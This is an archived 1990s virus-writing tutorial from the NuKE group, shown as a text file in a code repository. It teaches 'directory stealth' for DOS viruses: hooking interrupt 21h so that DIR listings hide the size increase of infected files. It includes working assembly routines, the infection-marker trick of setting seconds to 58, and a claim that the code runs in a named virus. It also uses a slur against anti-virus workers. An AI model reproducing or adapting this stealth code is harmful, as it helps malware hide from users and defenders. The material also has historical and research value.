informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/virus/rstut007.txt

158 lines
12 KiB
Plaintext
Raw Permalink Blame History

*****************************
** Directory Stealth **
** **
** By Rock Steady/NuKE **
*****************************
Stealth Viruses are the Viruses that I must admit Anti-Viral Queers
Don't tend to like at all. Emagine if we added a Polymorphic feature into
the Stealth Virus? But, if you want to Continue Writing Viruses you have
to make them Stealth. MS-DOS Version 6.0 Now comes with Virus Scanners
and CRC & Checksum Checkers. In order to stop many viruses, But it will
NEVER stop the `Stealth' Virus that is SMART of those AV features!
People think that there is ALOT of more INFECTED PCs since the virus
threat, started in 1986-7. Even though in the beginning only 10 or so
viruses were known, they Infected more systems, Compared to the viruses
today, where we have about 1300 and growing. But the truth is LESS PCs
are getting infect now, as people are now Virus Aware. With all the
utilities out, any joker can stop and clean a virus in seconds. Come
on, how many people MEMORIZED COMMAND.COM size? Out of my head its
47845 (MS-Dos V5.0). A simple increase of size tells me I got a problem.
A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth
feature. That will NOT show you the INCREASE of file size, when the
virus infects it. I have played with a few routines as such. I have
tried reducing the File size in the FAT area, which results in the
famous CHKDSK error reports of Loss Sectors, or Cross Links... And
fixing them with CHKDSK will result in damaging the file for good.
What can we do? How about reducing the File size Right AFTER its read
by DOS or any Utilities and right BEFORE its display on the screen!
Yeah that's an Idea, Here's how to go about it...
%Theory%
~~~~~~~~
First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h
function 11h & 12h is called! If you don't know how to Hook Interrupts
Read RESIDENT VIRIIs Article in this NewsLetter.
Int21_Handler:
cmp ah,11h ;Is a DOS `Dir' being done?
je dir_stealth ;Yes, Jump to `DIR_STEALTH'
cmp ah,12h ;Is a DOR `Dir' Being done?
je dir_stealth ;Yes, Jump to `DIR_STEALTH'
Int21Call:
jmp dword ptr cs:[Int21] ;Or Else Goto ORIGINAL Int 21h
ret ;Is need for the CALL of below
That's all that is needed in your Int21_Handler. Ofcourse if you are
infecting file that are being Execute you add it ABOVE! Anyhow lets
Explain the `DIR_STEALTH'
Offset Size Description
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[Normal FCB]<5D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
00h <20> 1 <20> Drive Number 00=current drive 01=A,02=B,03=C etc..
01h <20> 8 <20> Filename. Unused Spaces padded with Blanks
09h <20> 3 <20> Extension of Filename.
0Ch <20> 2 <20> Current block. points to block of records
0Eh <20> 2 <20> Record Size.
10h <20> 4 <20> FileSize in Bytes. (Low-order first, then high-order)
14h <20> 2 <20> Date of Last Write. YY-MM-DD into bits YYYY-YYYM-MMMD-DDDD
16h <20> 2 <20> Time of Last Write. HH:MM:SS into bits HHHH-HMMM-MMMS-SSSS
18h <20> 4 <20> Reserved
*1Ch <20> 4 <20> SAME `10h' but THIS FILESIZE gets printed on Screen!
20h <20> 1 <20> Offset of current record
21h <20> 4 <20> Relative Record
* = Field Changed by virus.
Extended FCB: Are Identical to the Normal FCB but, it has three new
~~~~~~~~~~~~ fields totalling 7 bytes. (That is why we add y to BX)
The additional 7 bytes are added to the BEGINNING!
Offset Size Description
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[Extended FCB]<5D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-07h <20> 1 <20> ALWAYS FFh tells use this is an Extended FCB
-06h <20> 5 <20> Reserved for DOS
-01h <20> 1 <20> Attribute Byte
So if we have an Extended FCB the first Byte will be FFh simply INC it
and if its ZERO you got a Extended FCB! You can also CMP ES:[BX],FFh
but that takes too many Bytes! Be COMPACT!!!
%Algorithms%
~~~~~~~~~~~~
CONDISTION: After calling Function 11h/12h (Int 21h) it will
search with the contents in the FCB. (*.*) which the DS:DX
registers point to the FCB. If successful it will DUPLICATE
the specified of the FCB in the current DTA (Disk Transfer Area)
And basically we will EDIT the info in the DTA!
NOTE: Just because we are using the DTA doesn't mean this will work for
function 4Eh/4Fh (Int 21h) that uses the DTA and ASCIIZ strings to
search, that is a different procedure, though somewhat the same as
this one. See Method #2, for that.
Step 1. We call the Int 21h so we may have the results to play with
BEFORE DOS displays them on screen.
Step 2. Get the Current PSP, As the FCB is located inside the PSP
in COM files its CS:0000 - CS:00FF. But in EXEs it can be any-
where, Int21h/AH=51 (Undocemented) will do this for us.
Step 3. Unmask the seconds (see if its infected) Quit if NOT
Step 4. Get the current DTA
Step 5. Test if it is Either an Extended FCB or Normal! If Extended
Simple add 7h to the Address. (As Extended only have 7 bytes
extra in the begining)
Step 6. Minus File size from the DTA! & Restore Time Back
; Here it is... Method #1
dir_stealth:
pushf ;Fake an INT Call
push cs ;Needed to return back HERE! (Virus)
call Int21Call ;Call the interrupt (See `Int21_Handler')
test al,al ;AL=00h if successful
jnz no_good ;Not Successful. Errors Eg:No More Files
push ax
push bx ;Save them since they will be used! So when
push es ;We exit all is restored to as Before!
mov ah,51h ;(Undocmented) Gets the Current PSP and puts
int 21h ;it into BX
mov es,bx ;ES now has PSP segment Address
cmp bx,es:[16h] ;Did we open a Good PSP?
jnz exit_man ;No, PSP unavailable, Exit Dude
mov bx,dx ;BX now points to the Original FCB in PSP
mov al,[bx] ;AL now has the current drive
push ax ;Save it to tell if its an Extended FCB
mov ah,2fh ;Get DTA (Disk Transfer Address)
int 21h
;Also before we start fiddling around we must know if we are working with
;And EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended
;Has three fields appended to the normal one... (Above)
pop ax ; AL = FFh if Extended FCB or else Drive #
inc al ; Will tell us if we have an Extended FCB
jnz fcb_ok ; No, We don't continue as normal
add bx,7h ; Yes, we do, add 7h to BX pointer
fcb_ok: mov ax,es:[bx+17h] ;Gets Seconds Field
and ax,1fh ;Unmask to have SECONDS only
xor al,1dh ;is it 58 seconds? (1d * 2)
jnz not_infected ;Nope, okay its not infected
and byte ptr es:[bx+17h],0e0h ;Restores seconds
sub es:[bx+1dh],virus_size ;Subtract FileSize with Virii
sbb es:[bx+1fh],ax ;Needed to fix up Bytes with
not_infected: ;Borrowing
pop es ;Ciao, Ciao
pop bx
pop ax
no_good:iret ;Pretend you came back from an Interrupt call!
;----------------------------The EnD-------------------------------------
Rock Steady / NuKE
`Feed my Frankenstein', Alice Cooper
NOTE: This Code Works, Look at NuKE PoX V1.1 to see it...
Reference in New Issue View Git Blame Copy Permalink